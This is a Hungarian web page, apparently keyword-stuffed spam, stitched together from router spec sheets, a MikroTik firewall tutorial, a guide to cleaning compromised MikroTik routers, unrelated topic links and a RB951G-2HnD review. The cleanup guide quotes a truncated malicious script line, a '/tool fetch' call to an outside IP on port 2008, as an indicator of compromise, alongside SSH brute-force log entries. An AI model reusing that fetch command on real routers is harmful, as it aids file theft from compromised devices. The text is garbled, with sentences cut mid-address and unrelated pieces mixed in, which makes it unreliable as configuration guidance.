10/100 Mbps LAN csatlakozó: 4
10/100 Mbps WAN csatlakozó: 1
3G: Nem
4G (LTE): Nem
Antenna: 2 darab belső
Beépített ADSL modem: Nem
Gigabit LAN csatlakozó: Nem
Gigabit WAN csatlakozó: Nem
HSDPA (3. 5 G): Nem
Magasság (mm): 29
Mélység (mm): 138
Nettó súly (g): 300
POE támogatás: Igen
Sebesség (max. ): Nem
Szélesség (mm): 113
Szín: Fehér
Telefon csatlakozó (db): Nem
Típus: Vezetékes és Vezeték nélküli
Titkosítási szabvány: Nincs adat
Tűzfal: Nem
USB csatlakozó (db): 1
WiFi szabvány: 802. 11 b/g/n
Mikrotik t fal beállítás login
Mikrotik t fal beállítás online
Az alaphelyzet
Egyes routereket karbantartanak a gazdái, másokat nem. Egyes routereken az automatikus frissítés valós, működő dolog, máshol nem. A mi ügyfeleink különféle döntéseket hoztak a routerek üzemeltetéséről: egyes routerekre semmilyen szolgáltatást nem igényelnek. Ez esetenként, sőt, hosszú évekig is gazdaságos döntés – de időnként mégis szükség van karbantartásra. Így most, egy sérülékenység kapcsán jópár olyan eszközön végig kellett menjünk, és frissítenünk kellett az OS-t és a formware-t, valamint el kellett távolítsuk az időközben felkerült kártékony dolgokat, amelyek eddig nem kaptak ilyen törődést. Az alábbi feladatsort erre dolgozuk ki, és publikáljuk, hátha más IT üzemeltető csapatnak is hasznos. Előkészületek
Admin tool a saját gépedre: winbox
Winbox for Win:
Winbox for OS X:
Linux: wine-nal a
G tábla vagy más lista és napló készítése a routereidről
Javasoljuk, hogy készíts egy G táblát, soronként egy routerrel, ahol naplózni tudjátok a tevékenységet, és rögzíteni tudjátok a nyomokat.
Mikrotik t fal beállítás model
Előszó Az előző cikk az alábbi mondattal ért véget:
"Rengeteg hátravan még ahhoz, hogy egy minden szempontból biztonságos, jól konfigurált eszközünk legyen, de az első lépést már megtettük. " Folytassuk tehát ahol abbahagytuk! Már megy az internetünk, biztos megtekintettük már a wiki oldalakat is. Másnap talán már el is felejtettük az egész rémálmot, amivel csak maga az internet beállítása járt. Előző alkalommal semmilyen szűrést nem kapcsoltunk be a tűzfalunkban. Nyugtasson meg minket a tudat: vannak olyanok, akik ezt a hibát élesben is elkövetik, sőt! A domain mögött lévő kívánt weboldal nem érhető el, hála a hibás router konfigurációnak. És ez csak egy, a sok-sok esetből. Sajnálatos példa ez és nem követendő. Ezzel kapcsolatosan feltételezem, hogy a kíváncsi felhasználók bizonyosan észrevették már, hogy ha belépnek a routerbe, és lekérik a log tartalmát a Log menüből, bizony sok nem várt bejegyzést látnak. Többen is próbálkoztak belépni ugyanis az eszközbe SSH-n keresztül! Szerencsére sikertelenül.
Mikrotik t fal beállítás download
Itt egy példa Google Táblázat, ebből készíthetsz egy másolatot. Ha többen dolgoztok, akkor ez a munkamenet:
kiválasztok egy sort
beírom a nevemet az A oszlopba, ezzel befoglalom a munkát
a rendszerdokumentációból kiveszem az IP, user, pw hármast
winboxszal belépek
Munka a Mikrotiken
0. Mentés a munka előtt
"New Terminal"-ban kiadni::global backupfile ([/system identity get name]. "-". [/system clock get date])
export file=$backupfile
/system backup save name=$backupfile
A bináris mentést itt nem kell megtartani, törölhető. VAGY:
export file=[a router neve]-[dátum]-a
1. system/scheduler
(schedule3_ vagy schedule1_ törlése, de minden task gyanús, de lehet pár a legális, pl openvpn. log küldés vagy ping)
Táblázatba ütemezett feladat neve
Schedule task interval/runcount
2. system/scripts
(script_3 vagy 3_script törlése, bármi gyanús, de lehet legális 1-1 ping vagy log küldő)
Pl. "/tool fetch address=95. 154. 216. 160 port=2008 src-path=/ mode="
3. files/ törlése
minden php gyanús
Php fájl létrehozásának dokumentálása
4.
Mikrotik routerek megtisztítása támadások után
15:56:18 system, error, critical login failure for user root from 218. 2. 0. 130 via ssh 15:56:19 system, error, critical login failure for user root from 218. 130 via ssh 16:07:01 system, error, critical login failure for user root from 61. 147. 80. 6 via ssh 16:07:10 system, error, critical login failure for user a from 61. 6 via ssh 16:07:13 system, error, critical login failure for user root from 61. 6 via ssh 16:07:18 system, error, critical login failure for user root from 61. 6 via ssh 16:07:22 system, error, critical login failure for user root from 61. 6 via ssh Emiatt is lett külön kiemelve az első cikkben, első lépésként a jelszó megváltoztatása! Anélkül a lépés nélkül bizony komoly bajba kerülhettünk volna. Ezen felbuzdulva a mostani alkalommal legyen a teendőnk a biztonság növelése. Ne feledjük, az eszköz nem bolondbiztos: nem akar automatán megoldani semmit, se megvédeni minket a gonosztól! Erre ne mint hátrány tekintsünk, hanem kezeljük megfelelően és utána a javunkat fogja szolgálni.
Monitor beállítás
MikroTik RB951G-2HnD
MikroTik Manual
MIKROTIK RB951G-2HnD SOHO Gigabit access point. CPU sebesség: 600MHz
CPU magok: 1
RAM: 128MB
LAN portok: 5 darab Gigabit port
Integrált Wireless: Igen – Wireless 802. 11b/g/n szabványok
USB: 1 darab
Power Jack: 8-30V DC
PoE: 8-30V DC Ether1
Méretek: 113x138x29mm
Operációs rendszer: RouterOS
Hőmérséklet: -20C.. +50 C
Antenna gain: 2. 5dBi
TX teljesítmény: 30dBm
CPU: Atheros AR9344
Max Áramfogyasztás: 7W
Ki ne ismerné a nevét a MIKROTIK RB951G-2HnD hálózati eszköznek? Már évek óta stabilan fent van az informatikai webáruházak polcain és természetesen ez nem véletlen. Közepes és kisebb méretű irodákban találkozhatunk vele, ha van egy valaimre való rendszergazdájuk. Üzemeltetése könnyű, hiszen csak egyszer kell beállítani és utána olyan stabilan ketyeg, hogy hihetetlen. Jelenleg is tartja az árát, ami szintén nem véletlen, hiszen a meghibásodási arány nagyon jónak mondható és kapunk hozzá DNS (Cloud) szolgáltatást is. A MIKROTIK RB951G-2HnD router RouterOS operációs rendszert futtat és a kezelő felületről automatikusan telepíthetjük a frissítéseket is.
Mikrotik t fal beállítás 2017
- A náci Németország 75 éve szállta meg Magyarországot
- Wartner szemölcseltávolító fagyasztó spray
- Tűzfal
- Foci tv műsor shows
- Komárom esztergom megye járásai
Régóta ismerem, de csak most szántam rá magam, hogy itthon is egy MikroTik-ot nyúzzak. Talán a lehetőségek fogtak meg benne és az, hogy jól kezeli a WIFI-csatorna automatikus váltását. Nálam ezzel gond volt eddig, de mióta beüzemeltem, nincs WIFI problémám a lakásban, igaz csak b/g/n szabványokat kezel. Lemondtam az ac szabványról a stabilitás érdekében, de az 5 darab LAN portunk gigabites. Csak szemléltetésül egy Wifi Analyzer programmal készült kép. Bal oldalon az 1-es és 3-as csatorna környékén küzd a Chihuahua UPC modemen beállított Wifi hálózatom az életben maradásért. Jobb oldalon toronymagasan látható a MikroTik Wifi hálózatom. Ezekben az órákban még nem is látható sok Wifi hálózat, később lesz a nagy tömeg, de akkor is szépen megbírkózik a csatornaváltásokkal. Egyáltalán nem Wifi bajnok a MikroTik RB951G-2HnD, de ha egy panellakásban beüzemeljük, akkor nem nagyon lesz Wireless csatorna problémánk. Első használat esetén nem kell aggódnunk, olyan mint más eszközök. A kezelőfelületét böngészőből ( WebFig) a 192.
Itt engedélyezhetjük a VPN kapcsolatot (VPN Access) is. A VPN Address és VPN User alap értékek, szóval nem lehet módosítani, csak a jelszót adhatjuk meg szabadon és már sima PPTP kapcsolaton tudunk csatlakozni az otthoni hálózatunkra. A többi végtelen beállítási lehetőséget a bal oldalon találjuk meg. A konfigurációs felületet Android rendszerű telefonról is könnyen elérhetjük, csak a Tik-App alkalmazást kell telepíteni a telefonra. Igaz még eléggé "bugos" ami fel is van tüntetve, de fejlesztik és elég sűrűn jönnek hozzá a frissítések. Hard Reset
Kikapcsolod, majd a Reset gombot nyomvatartod, majd bekapcsolod és a Led mikor villogni kezd, akkor kell elengedni. MikroTik
168. 88. 1 ip-címen érjük el. Az alapbeállítássokban belépésnél a felhasználó admin, a jelszó mezőt hagyjuk üresen. Belépés után, pedig fogad bennünket a MikroTik RB951G-2HnD beállító felülete. A MikroTik konfigurációs felületét a WinBox alkalmazás segítségével is elérhetjük, amit letölthetünk innen. A WinBox alap portja 8291 számon figyel, távolról ezt a portot kell megadnunk a csatlakozáshoz, ha nem állítottuk át az értékét. [ip-cím:port]
A Quick Set oldalon tudjuk beállítani a wifi hozzáférést és azt, hogy statikus, automatikus, vagy PPPoE protokollt használjon. Ugye ez a beállítás az internetszolgáltatótól függ. Érdemes DMZ-be tenni, vagy a szolgáltatótól kapott router eszközünket, illetve a modemet nem router, hanem switch, vagy modem üzemmódba kapcsolni. Így minden feladatot (portok, tűzfal) a MikroTik fog kezelni. Továbbá a kezdő oldalon állíthatunk IP-címet, hogy a routert milyen belső címről (LAN) akarjuk elérni, meg DHCP tartományt és a jobb alsó sarokban (Password…) adhatunk, illetve védhetjük le jelszóval a bejelentkezést az eszközre.